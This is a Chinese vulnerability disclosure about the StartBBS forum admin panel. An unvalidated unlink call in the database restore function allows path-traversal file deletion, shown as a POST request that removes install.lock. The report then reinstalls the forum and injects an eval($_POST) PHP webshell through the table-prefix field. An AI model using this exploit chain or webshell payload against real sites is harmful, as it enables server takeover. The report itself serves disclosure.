开源轻论坛StartBBS后台任意文件删除+getshell（需要管理员权限）

### 简要描述： 找了好半天，感觉没太好的后台getshell的方法。 分析我以前交的一个前台getshell漏洞（http://wooyun.org/bugs/wooyun-2013-045143），就是通过重装来getshell的（最新版本v1.1.5任意重装的洞已经修了，但重装的位置依旧可以getshell），那么如果有一个任意文件删除洞的话，岂不就能删除.lock文件，来重新安装了呢？来getshell了呢？ 我之前也一直用CI做开发，常参考startbbs的源码，在这里说声谢谢~ ### 详细说明： 后台代码app/controllers/admin/db_admin.php 75行 ``` public function restore($sqlfile='') { $data['title'] = '数据库还原'; $data['act']=$this->uri->segment(3); $data['sqlfiles'] = get_dir_file_info(FCPATH.'data/backup', $top_level_only = TRUE); if($_POST){ $sqlfiles=array_slice($this->input->post(), 0, -1); //echo var_export($sqlfiles); foreach($sqlfiles as $k=>$v){ unlink(FCPATH.'data/backup/'.$v); } $this->session->set_flashdata('error', '删除sql文件成功!'); redirect('admin/db_admin/restore'); } if($sqlfile){ $sql = file_get_contents(FCPATH.'data/backup/'.$sqlfile); if($this->run_sql($sql)){ $this->session->set_flashdata('error', '还原sql文件成功!'); redirect('admin/db_admin/restore'); } } $this->load->view('db_admin', $data); } ``` 这是一个进行数据库还原操作的函数，其中可以对已经备份好的数据库文件进行删除。但是没有验证文件名，导致可以任意文件删除。 代码直接取POST数组（最后一个变量除外，不知为什么），用foreach遍历之，然后删除所有$_POST数组中的值。 详见漏洞证明。 ### 漏洞证明： 登录后台，直接向index.php/admin/db_admin/restore/这个地址POST数据a=../../install.lock&b=x，想删除多少文件都行（加POST数组内容即可，键名随意，键值是你要删除的文件位置），但我只删除安装锁,.lock文件。 [<img src="https://images.seebug.org/upload/201405/11213639593d771b10fea0fed5de16b930a3cbf0.jpg" alt="009.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/11213639593d771b10fea0fed5de16b930a3cbf0.jpg) 如上图，提示删除成功了。来到前台首页，发现跳转到安装页面了： [<img src="https://images.seebug.org/upload/201405/1121392114678448c85aaf244c90cf1e240d3eef.jpg" alt="010.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/1121392114678448c85aaf244c90cf1e240d3eef.jpg) 顺理成章，重装系统。找一个可以外连的数据库，填好信息，然后在表前缀的位置填入一句话: ``` sb_';phpinfo();@eval ($_POST[101]);$xxx=' ``` [<img src="https://images.seebug.org/upload/201405/112143580e931956467aae289ce5ed474506e9f9.jpg" alt="011.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/112143580e931956467aae289ce5ed474506e9f9.jpg) 安装好以后，访问首页就能看到phpinfo了。菜刀直接连index.php，连数据库配置文件是不行的。 [<img src="https://images.seebug.org/upload/201405/1121455066f0e3d4b594bd46782addc2c81848a2.jpg" alt="012.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/1121455066f0e3d4b594bd46782addc2c81848a2.jpg) 查看数据库配置文件，发现马已经安静地躺在那里了： [<img src="https://images.seebug.org/upload/201405/11214808a65b574f16cfdde6f534df97516f5540.jpg" alt="013.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/11214808a65b574f16cfdde6f534df97516f5540.jpg)